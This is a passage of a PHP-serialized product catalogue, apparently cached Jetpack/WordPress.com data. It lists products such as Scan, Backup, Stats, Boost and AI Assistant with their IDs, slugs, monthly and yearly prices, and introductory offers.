Daily\";s:12:\"product_slug\";s:20:\"jetpack_scan_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.95;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"jetpack_scan_realtime\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2108;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:21:\"jetpack_scan_realtime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$500.00\";s:21:\"combined_cost_display\";s:7:\"$500.00\";s:4:\"cost\";i:500;s:18:\"cost_smallest_unit\";i:50000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$41.67\";}s:29:\"jetpack_scan_realtime_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2109;s:12:\"product_name\";s:21:\"Jetpack Scan Realtime\";s:12:\"product_slug\";s:29:\"jetpack_scan_realtime_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-scan-realtime\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$50.00\";s:21:\"combined_cost_display\";s:6:\"$50.00\";s:4:\"cost\";i:50;s:18:\"cost_smallest_unit\";i:5000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:17:\"jetpack_anti_spam\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2110;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:17:\"jetpack_anti_spam\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.4;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"jetpack_anti_spam_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2111;s:12:\"product_name\";s:25:\"Jetpack Akismet Anti-spam\";s:12:\"product_slug\";s:25:\"jetpack_anti_spam_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-anti-spam\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.95;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t1_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2112;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.4;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"jetpack_backup_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2113;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.95;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t2_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2114;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$359.40\";s:21:\"combined_cost_display\";s:7:\"$359.40\";s:4:\"cost\";d:359.4;s:18:\"cost_smallest_unit\";i:35940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$29.95\";}s:25:\"jetpack_backup_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2115;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1TB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-2\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.95;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:18:\"jetpack_videopress\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2116;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:18:\"jetpack_videopress\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.4;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:26:\"jetpack_videopress_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2117;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:26:\"jetpack_videopress_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:18:\"jetpack-videopress\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.95;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"jetpack_backup_t0_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2120;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1GB)\";s:12:\"product_slug\";s:24:\"jetpack_backup_t0_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$35.88\";s:21:\"combined_cost_display\";s:6:\"$35.88\";s:4:\"cost\";d:35.88;s:18:\"cost_smallest_unit\";i:3588;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$2.99\";}s:25:\"jetpack_backup_t0_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2121;s:12:\"product_name\";s:31:\"Jetpack VaultPress Backup (1GB)\";s:12:\"product_slug\";s:25:\"jetpack_backup_t0_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-0\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.99\";s:21:\"combined_cost_display\";s:5:\"$2.99\";s:4:\"cost\";d:2.99;s:18:\"cost_smallest_unit\";i:299;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_backup_t1_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2123;s:12:\"product_name\";s:32:\"Jetpack VaultPress Backup (10GB)\";s:12:\"product_slug\";s:27:\"jetpack_backup_t1_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack-backup-tier-1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$238.80\";s:21:\"combined_cost_display\";s:7:\"$238.80\";s:4:\"cost\";d:238.8;s:18:\"cost_smallest_unit\";i:23880;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.05;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:19:\"jetpack_search_free\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2130;s:12:\"product_name\";s:19:\"Jetpack Search Free\";s:12:\"product_slug\";s:19:\"jetpack_search_free\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:6:\"search\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:19:\"jetpack-search-free\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:5:\"$0.00\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"jetpack_backup_one_time\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2201;s:12:\"product_name\";s:36:\"Jetpack VaultPress Backup (One-time)\";s:12:\"product_slug\";s:23:\"jetpack_backup_one_time\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-backup-one-time\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.99\";s:21:\"combined_cost_display\";s:5:\"$0.99\";s:4:\"cost\";d:0.99;s:18:\"cost_smallest_unit\";i:99;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_stats_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2219;s:12:\"product_name\";s:34:\"Jetpack Stats (Commercial license)\";s:12:\"product_slug\";s:20:\"jetpack_stats_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack_stats_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:7:\"$100.00\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:21:\"jetpack_stats_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2220;s:12:\"product_name\";s:34:\"Jetpack Stats (Commercial license)\";s:12:\"product_slug\";s:21:\"jetpack_stats_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"jetpack_stats_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$10.00\";s:21:\"combined_cost_display\";s:6:\"$10.00\";s:4:\"cost\";i:10;s:18:\"cost_smallest_unit\";i:1000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"jetpack_stats_free_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2221;s:12:\"product_name\";s:43:\"Jetpack Stats (Free non-commercial license)\";s:12:\"product_slug\";s:25:\"jetpack_stats_free_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack_stats_free_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:5:\"$0.00\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$0.00\";}s:25:\"jetpack_stats_pwyw_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2222;s:12:\"product_name\";s:20:\"Jetpack Stats (Paid)\";s:12:\"product_slug\";s:25:\"jetpack_stats_pwyw_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"jetpack_stats_pwyw_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:5:\"$0.00\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";i:0;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$0.00\";}s:23:\"jetpack_monitor_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2241;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:23:\"jetpack_monitor_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-monitor\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$1.00\";s:21:\"combined_cost_display\";s:5:\"$1.00\";s:4:\"cost\";i:1;s:18:\"cost_smallest_unit\";i:100;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_monitor_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2242;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:22:\"jetpack_monitor_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-monitor\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.00\";s:21:\"combined_cost_display\";s:6:\"$12.00\";s:4:\"cost\";i:12;s:18:\"cost_smallest_unit\";i:1200;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$1.00\";}s:21:\"jetpack_boost_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2400;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:21:\"jetpack_boost_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.95;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:20:\"jetpack_boost_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2401;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:20:\"jetpack_boost_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:13:\"jetpack-boost\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.4;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:18:\"jetpack_ai_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2450;s:12:\"product_name\";s:20:\"Jetpack AI Assistant\";s:12:\"product_slug\";s:18:\"jetpack_ai_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:10:\"jetpack-ai\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$10.00\";s:21:\"combined_cost_display\";s:6:\"$10.00\";s:4:\"cost\";i:10;s:18:\"cost_smallest_unit\";i:1000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:17:\"jetpack_ai_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2451;s:12:\"product_name\";s:20:\"Jetpack AI Assistant\";s:12:\"product_slug\";s:17:\"jetpack_ai_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:10:\"jetpack-ai\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:7:\"$100.00\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:22:\"jetpack_social_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2500;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:22:\"jetpack_social_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-social\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.00\";s:21:\"combined_cost_display\";s:6:\"$12.00\";s:4:\"cost\";i:12;s:18:\"cost_smallest_unit\";i:1200;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_social_basic_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2503;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:27:\"jetpack_social_basic_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.4;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":6:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.4;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:28:\"jetpack_social_basic_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2504;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:28:\"jetpack_social_basic_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.95;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:30:\"jetpack_social_advanced_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2602;s:12:\"product_name\";s:30:\"Jetpack Social Advanced 